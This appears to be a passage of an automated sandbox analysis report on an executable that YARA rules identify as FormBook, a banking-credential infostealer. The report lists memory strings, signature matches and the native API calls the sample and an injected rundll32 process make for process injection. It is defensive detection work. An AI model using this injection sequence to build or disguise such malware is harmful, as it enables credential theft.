          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: rundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: PQMW0W5h3X.exe, 00000000.00000002.334621545.000000000073A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A495D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A498A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A499D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A495F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49560 NtWriteFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A496D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00418300 NtClose,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C18280 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C183B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C18300 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C181D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C18222 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C183AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004047D3
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004061D4
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0040102E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B8FB
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00408C6C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00408C70
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B57A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00402D88
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041C58A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD20A8
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B090
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD28EC
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ADE824
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1002
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0F900
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD22AE
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3EBB0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACDBD2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD2B28
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1841F
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACD466
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1D5E0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD25DD
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A00D20
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD2D07
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD1D55
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD2EF7
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A26E30
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACD616
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD1FF1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0040102E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00401030
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B8FB
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00408C6C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00408C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467D466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04681D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04682D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B0D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046825DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CD5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D6E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467D616
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04682EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04681FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468DFCE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468E824
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04671002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046828EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046820A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BF900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466FA2B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046822AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04682B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467DBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046703DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EEBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B8FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C02FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C08C6C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C08C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C02D88
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1C58A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C02D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B57A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: String function: 00A0B150 appears 35 times
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 045BB150 appears 48 times
          Source: PQMW0W5h3X.exe, 00000000.00000003.330860083.00000000098B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PQMW0W5h3X.exe
          Source: PQMW0W5h3X.exe, 00000002.00000002.382278358.000000000265C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs PQMW0W5h3X.exe
          Source: PQMW0W5h3X.exe, 00000002.00000002.381909590.0000000000AFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PQMW0W5h3X.exe
          Source: PQMW0W5h3X.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
